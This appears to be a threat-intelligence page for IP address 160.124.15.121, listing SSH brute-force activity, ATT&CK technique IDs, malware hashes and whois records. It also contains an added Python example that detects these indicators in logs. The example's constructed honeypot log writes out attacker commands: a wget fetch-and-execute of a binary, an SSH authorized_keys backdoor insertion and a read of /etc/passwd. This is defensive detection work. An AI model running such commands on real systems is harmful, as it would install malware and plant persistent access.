160.124.15.121 Threat Intelligence and Host Information


General

This page contains threat intelligence for the IPv4 address 160.124.15.121. It was generated either because malicious activity was observed from the address or as an information-gathering exercise to enrich security events with context. All information is gathered passively, by aggregating public sources or by observing activity against honeynets. The host score is calculated from a series of statistically weighted values and machine learning that take into account metadata such as host information; the frequency, volume and global distribution of malicious activity; association with other known malicious hosts or networks; proxying or anonymising behaviour such as Tor exit nodes, residential proxies or VPN services; and many other attributes. These values are historical and indicative only, and should not be taken as an accurate representation of the users, businesses or networks behind the address.

Likely Malicious Host 🟠 60/100

Host and Network Information

  • Mitre ATT&CK IDs: T1078 - Valid Accounts, T1083 - File and Directory Discovery, T1098.004 - SSH Authorized Keys, T1105 - Ingress Tool Transfer, T1110.004 - Credential Stuffing, T1110 - Brute Force
  • Tags: cowrie, cyber security, ioc, malicious, Nextray, phishing, ssh

  • View other sources: Spamhaus, VirusTotal

  • Country: South Africa
  • Network: AS132839 power line datacenter (note: the route object in the Whois section below lists AS6083 as origin for 160.124.0.0/16; verify the current announcing ASN before acting on the network attribution)
  • Noticed: 30 times
  • Protocols Attacked: SSH
  • Countries Attacked: Canada, Czechia, Denmark, Estonia, France, Germany, Latvia, Lithuania, Norway, Poland, Romania, Turkey, Ukraine, United Kingdom of Great Britain and Northern Ireland, United States of America
  • Passive DNS Results: arnoldschwarzeneggerpdfdrive.com, immuneplant.com, 180remodeling.com, 9cma2q.com, zhongketest.com, landroversouth.com, pythonlib.cn

Malware Detected on Host

Count: 6 (SHA-256)

  • b9df41c142b326c475607b3044c4e46835254fdae899f3d28b9829e4ebc41212
  • 0e0897781e3ca4773de29d36101ea7c9360b67f461617afa50d19b76254d6bd1
  • 578d15c10a6df0cbe9d93e54d1bb0b4ff415196363279c5fac6971e908b39ef3
  • efca6b2dafcdb637761cdff09a3b3e4dcafc5de37340269521f2f6efc72fa6d2
  • 3cc4f508e06647c98d38ab24eff9de3fd27acd91f42ca9ff76b381cee1a942c1
  • 331abe9b8b35cdb3d38eeb1349e18a13aff1b92e93f03f9cb7f28dd679972c61
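The following is an added example, not part of this page's own tooling or data. It shows how the IOCs above (the source IP from the host information and the six SHA-256 hashes from the malware list) can be matched against sshd auth.log lines and Cowrie JSON events, and how the observations map onto the ATT&CK IDs the page lists (T1110, T1078, T1083, T1098.004, T1105). Every log line is constructed: the hostname, PIDs, client ports and download URL are invented, the Cowrie field names (eventid, src_ip, session, username, input, url, shasum) follow Cowrie's JSON log format but the values are made up, and the brute-force threshold of three failures is an arbitrary choice.

```python
import json
import re
from collections import Counter, defaultdict

IOC_IP = "160.124.15.121"  # source IP from the page
IOC_SHA256 = {  # the six "Malware Detected on Host" hashes from the page
    "b9df41c142b326c475607b3044c4e46835254fdae899f3d28b9829e4ebc41212",
    "0e0897781e3ca4773de29d36101ea7c9360b67f461617afa50d19b76254d6bd1",
    "578d15c10a6df0cbe9d93e54d1bb0b4ff415196363279c5fac6971e908b39ef3",
    "efca6b2dafcdb637761cdff09a3b3e4dcafc5de37340269521f2f6efc72fa6d2",
    "3cc4f508e06647c98d38ab24eff9de3fd27acd91f42ca9ff76b381cee1a942c1",
    "331abe9b8b35cdb3d38eeb1349e18a13aff1b92e93f03f9cb7f28dd679972c61",
}
BRUTE_THRESHOLD = 3  # assumed: failed logins from one source before we call it T1110
# Constructed sshd auth.log lines (hostname, PIDs and client ports are invented).
SSHD_LOG = """\
Apr  1 03:12:01 bastion sshd[4121]: Failed password for root from 160.124.15.121 port 51230 ssh2
Apr  1 03:12:03 bastion sshd[4121]: Failed password for root from 160.124.15.121 port 51230 ssh2
Apr  1 03:12:05 bastion sshd[4125]: Failed password for invalid user admin from 160.124.15.121 port 51236 ssh2
Apr  1 03:12:09 bastion sshd[4130]: Accepted password for deploy from 160.124.15.121 port 51240 ssh2
Apr  1 03:15:44 bastion sshd[4200]: Accepted publickey for alice from 10.0.0.7 port 40022 ssh2
"""
# Constructed Cowrie JSON-lines events: field names follow Cowrie's JSON log, values are invented.
COWRIE_LOG = "\n".join(json.dumps(e) for e in [
    {"eventid": "cowrie.login.failed", "src_ip": IOC_IP, "session": "s1", "username": "root", "password": "123456"},
    {"eventid": "cowrie.login.success", "src_ip": IOC_IP, "session": "s1", "username": "root", "password": "root"},
    {"eventid": "cowrie.command.input", "src_ip": IOC_IP, "session": "s1", "input": "ls -la /root /home; cat /etc/passwd"},
    {"eventid": "cowrie.command.input", "src_ip": IOC_IP, "session": "s1",
     "input": "echo 'ssh-rsa AAAAB3Nza... x' >> ~/.ssh/authorized_keys"},
    {"eventid": "cowrie.command.input", "src_ip": IOC_IP, "session": "s1",
     "input": "wget http://203.0.113.9/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"},
    {"eventid": "cowrie.session.file_download", "src_ip": IOC_IP, "session": "s1", "url": "http://203.0.113.9/x86",
     "shasum": "b9df41c142b326c475607b3044c4e46835254fdae899f3d28b9829e4ebc41212"},
])

SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)
# Shell command patterns mapped to the ATT&CK IDs the page lists for this host.
COMMAND_RULES = [
    (re.compile(r"authorized_keys"), "T1098.004 - SSH Authorized Keys"),
    (re.compile(r"\b(wget|curl|tftp|ftpget|scp)\b"), "T1105 - Ingress Tool Transfer"),
    (re.compile(r"\b(ls|find|cat|tree)\b"), "T1083 - File and Directory Discovery"),
]
T_BRUTE = "T1110 - Brute Force"
T_VALID = "T1078 - Valid Accounts"


def parse_sshd(text):
    """Yield (result, user, ip) for every sshd login line that matches SSHD_RE."""
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if m:
            yield m["result"], m["user"], m["ip"]


def parse_cowrie(text):
    """Yield Cowrie events from JSON-lines text, skipping blank or malformed lines."""
    for line in text.splitlines():
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def analyse(sshd_text, cowrie_text, ioc_ips=frozenset({IOC_IP}), ioc_hashes=IOC_SHA256):
    """Return per-source ATT&CK IDs, failed-login counts and IOC hash hits."""
    failed = Counter()
    techniques = defaultdict(set)
    hash_hits = []

    # sshd: count failures per source; a success is T1078 only when the source is a
    # known IOC or has already failed against this host (a clean login is just a user).
    for result, _user, ip in parse_sshd(sshd_text):
        if result == "Failed":
            failed[ip] += 1
        elif ip in ioc_ips or failed[ip]:
            techniques[ip].add(T_VALID)

    # Cowrie: same login logic, then inspect commands and downloaded files.
    for ev in parse_cowrie(cowrie_text):
        ip, kind = ev.get("src_ip"), ev.get("eventid", "")
        if kind == "cowrie.login.failed":
            failed[ip] += 1
        elif kind == "cowrie.login.success" and (ip in ioc_ips or failed[ip]):
            techniques[ip].add(T_VALID)
        elif kind == "cowrie.command.input":
            for pattern, tid in COMMAND_RULES:
                if pattern.search(ev.get("input", "")):
                    techniques[ip].add(tid)
        elif kind == "cowrie.session.file_download":
            sha = ev.get("shasum", "").lower()
            if sha in ioc_hashes:
                hash_hits.append((ip, sha))

    for ip, n in failed.items():
        if n >= BRUTE_THRESHOLD:
            techniques[ip].add(T_BRUTE)
    return {
        "techniques": {ip: sorted(t) for ip, t in techniques.items()},
        "failed_logins": dict(failed),
        "hash_hits": hash_hits,
    }
```

Running `analyse(SSHD_LOG, COWRIE_LOG)` attributes all five listed technique IDs to 160.124.15.121, counts four failed logins and reports one hash hit on the downloaded file, while the unrelated successful login from 10.0.0.7 is not flagged. The page's T1110.004 (Credential Stuffing) is deliberately not emitted: telling stuffing apart from plain brute force needs knowledge of the credential pairs used, which these logs do not give.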

Open Ports Detected

5985 (default WinRM HTTP listener port), 80 (HTTP), 8081


Whois Information

  • inetnum: 160.124.0.0 - 160.124.255.255
  • netname: POSIX-AFRICA
  • descr: Posix Systems (Pty) Ltd
  • descr: P.O. Box 73892
  • descr: Lynnwood Ridge, 0040
  • country: ZA
  • org: ORG-PS1-AFRINIC
  • admin-c: MJE-AFRINIC
  • tech-c: MJE-AFRINIC
  • status: ASSIGNED PI
  • mnt-by: AFRINIC-HM-MNT
  • mnt-lower: POSIX-MNT
  • mnt-domains: POSIX-MNT
  • mnt-routes: POSIX-MNT
  • parent: 0.0.0.0 - 255.255.255.255
  • organisation: ORG-PS1-AFRINIC
  • org-name: Posix Systems (Pty) Ltd
  • org-type: EU-PI
  • country: ZA
  • address: P.O. Box 73892
  • address: Lynnwood Ridge 0040
  • phone: tel:+27-82-601-0496
  • phone: tel:+27-12-807-0590
  • admin-c: MJE-AFRINIC
  • admin-c: AEP-AFRINIC
  • tech-c: MJE-AFRINIC
  • tech-c: AEP-AFRINIC
  • mnt-ref: AFRINIC-HM-MNT
  • mnt-ref: POSIX-MNT
  • mnt-by: AFRINIC-HM-MNT
  • person: Mark Elkins
  • nic-hdl: MJE-AFRINIC
  • address: Posix Systems (Pty) Ltd
  • address: P O Box 73892
  • address: Gauteng
  • address: Lynnwood Ridge 0040
  • address: South Africa
  • phone: tel:+27-82-601-0496
  • org: org-ps1-afrinic
  • mnt-by: POSIX-MNT
  • route: 160.124.0.0/16
  • descr: Posix Systems, South Africa
  • origin: AS6083
  • mnt-by: POSIX-MNT

Links to attack logs

  • bruteforce-ip-list-2021-04-01